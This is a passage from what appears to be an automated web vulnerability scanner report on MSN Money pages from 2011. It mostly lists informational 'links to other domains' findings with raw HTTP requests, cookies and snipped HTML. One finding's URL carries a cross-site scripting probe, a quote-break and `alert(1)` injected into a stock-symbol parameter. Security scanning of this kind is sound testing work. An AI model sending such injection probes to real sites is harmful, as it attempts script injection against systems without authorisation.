http://norris.blogs.nytimes.com/?ref=business
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://seekingalpha.com/
http://techcrunch.com/2010/03/28/quora-has-the-magic-benchmark-invests-at-86-million-valuation/
http://www.247wallst.com/
http://www.alleyinsider.com/
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1
http://www.cannex.com/
http://www.dailyspeculations.com/wordpress/
http://www.dealbreaker.com/
http://www.delish.com/
http://www.digstock.com/blogdigg.php
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.howardlindzon.com/
http://www.huffingtonpost.com/business/
http://www.interactivedata-rts.com/
http://www.kudlowsmoneypolitics.blogspot.com/
http://www.mercurynews.com/business/ci_17039439?nclick_check=1
http://www.moneytalksnews.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.portfolio.com/views/blogs/market-movers/2008/09/20/hank-paulson-buy-sider
http://www.prospect.org/csnc/blogs/beat_the_press
http://www.reuters.com/
http://www.rgemonitor.com/blog/roubini
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.thedisciplinedinvestor.com/
http://www.tickersense.typepad.com/
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410477&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Ftop-stocks%2Fpost.aspx%3Fpost%3D2150c69c-d2a4-4ab3-821b-4697128c6c1e&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 18:01:17 GMT
Content-Length: 69147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410477&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Ftop-stocks%2Fpost.aspx%3Fpost%3D2150c69c-d2a4-4ab3-821b-4697128c6c1e&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0763-0000-0000-000000000000_20110128204040_Bono_012811_AP_164.jpg" alt="Credit: (© Virginia Mayo/AP)
Caption: Bono" class="imagefloatleft userImage lead" />Bono hasn't had the best go as a technology investor. His private-equity firm, Elevation Partners, lost some geek cred after plowing $460 million into failed device maker Palm.<br />
...[SNIP]...
<br />Such is the rocky life of a big-risk, big-reward private equity firm. But the U2 frontman's company may face its toughest hurdle yet, now that a co-founder has decided to leave. <a href="http://finance.fortune.cnn.com/2011/01/26/exclusive-elevations-bodnick-is-headed-to-quora/?section=magazines_fortune" title="http://finance.fortune.cnn.com/2011/01/26/exclusive-elevations-bodnick-is-headed-to-quora/?section=magazines_fortune">Fortune reports</a> that Marc Bodnick is resigning as co-founding partner at Elevation for a position at Quora, an online question-and-answer site <a href="http://techcrunch.com/2010/03/28/quora-has-the-magic-benchmark-invests-at-86-million-valuation/" title="http://techcrunch.com/2010/03/28/quora-has-the-magic-benchmark-invests-at-86-million-valuation/">valued last year</a>
...[SNIP]...
<br />His departure is damaging enough for Elevation. But <a href="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1" title="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1">today brings word</a>
...[SNIP]...
 The feud was simmering in private, <a href="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1" title="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1">The Daily Beast reports</a>
...[SNIP]...
<br />In 2007, all three partners made personal investments in Facebook by buying large chunks of stock from employees, <a href="http://www.mercurynews.com/business/ci_17039439?nclick_check=1" title="http://www.mercurynews.com/business/ci_17039439?nclick_check=1">The San Jose Mercury-News reports</a>
...[SNIP]...
rlBinary', 'True','1');" href="http://money.msn.com/top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ry', 'True','0');" href="http://money.msn.com/top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.247wallst.com/" class="opennew">24/7 Wall Street</a>
...[SNIP]...
<li><a href="http://confusedcapitalist.blogspot.com/" class="opennew">The Confused Capitalist</a>
...[SNIP]...
<li><a href="http://dealbook.blogs.nytimes.com/">DealBook</a></li><li><a href="http://www.dealbreaker.com/" class="opennew">DealBreaker.com</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/business/" class="opennew">Huffington Post Business</a>
...[SNIP]...
<li><a href="http://www.rgemonitor.com/blog/roubini" class="opennew">Nouriel Roubini's blog</a>
...[SNIP]...
<li><a href="http://seekingalpha.com/" class="opennew">Seeking Alpha</a>
...[SNIP]...
<li><a href="http://bigpicture.typepad.com/" class="opennew">The Big Picture</a>
...[SNIP]...
<li><a href="http://norris.blogs.nytimes.com/?ref=business" class="opennew">Floyd Norris: Notions on High and Low Finance</a>
...[SNIP]...
<li><a href="http://www.dailyspeculations.com/wordpress/" class="opennew">Daily Speculations</a>
...[SNIP]...
<li><a href="http://www.tickersense.typepad.com/" class="opennew">Ticker Sense</a>
...[SNIP]...
<li><a href="http://freakonomics.blogs.nytimes.com/" class="opennew">Freakonomics</a>
...[SNIP]...
<li><a href="http://www.prospect.org/csnc/blogs/beat_the_press" class="opennew">Beat the Press</a>
...[SNIP]...
<li><a href="http://www.kudlowsmoneypolitics.blogspot.com/" class="opennew">Kudlow's Money Politic$</a>
...[SNIP]...
<li><a href="http://www.moneytalksnews.com/" class="opennew">Money Talks News</a>
...[SNIP]...
<li><a href="http://delong.typepad.com/sdj/index_heavy.html" class="opennew">Brad DeLong's Semi-Daily Journal</a>
...[SNIP]...
<li><a href="http://www.digstock.com/blogdigg.php" class="opennew">DigStock Dig Blog</a>
...[SNIP]...
<li><a href="http://www.alleyinsider.com/" class="opennew">Silicon Alley Insider</a>
...[SNIP]...
<li><a href="http://www.thedisciplinedinvestor.com/" class="opennew">The Disciplined Investor</a>
...[SNIP]...
<li><a href="http://www.howardlindzon.com/" class="opennew">Howard Lindzon</a>
...[SNIP]...
<li class="last"><a href="http://www.portfolio.com/views/blogs/market-movers/2008/09/20/hank-paulson-buy-sider" class="opennew">Market Movers</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.214. http://redacted/investor/StockRating/srstopstocksresults.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srstopstocksresults.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/StockRating/srstopstocksresults.aspx?sco=1

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410638&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/StockRating/srstopstocksresults.aspx&Query=sco=1&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:03:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 55915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410638&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/StockRating/srstopstocksresults.aspx&Query=sco=1&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.215. http://redacted/investor/StockRating/srstopstocksresults.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srstopstocksresults.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/StockRating/srstopstocksresults.aspx?sco=1

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353610&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/StockRating/srstopstocksresults.aspx&Query=sco=1&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 55922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353610&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/StockRating/srstopstocksresults.aspx&Query=sco=1&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.216. http://redacted/investor/charts/chartdl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
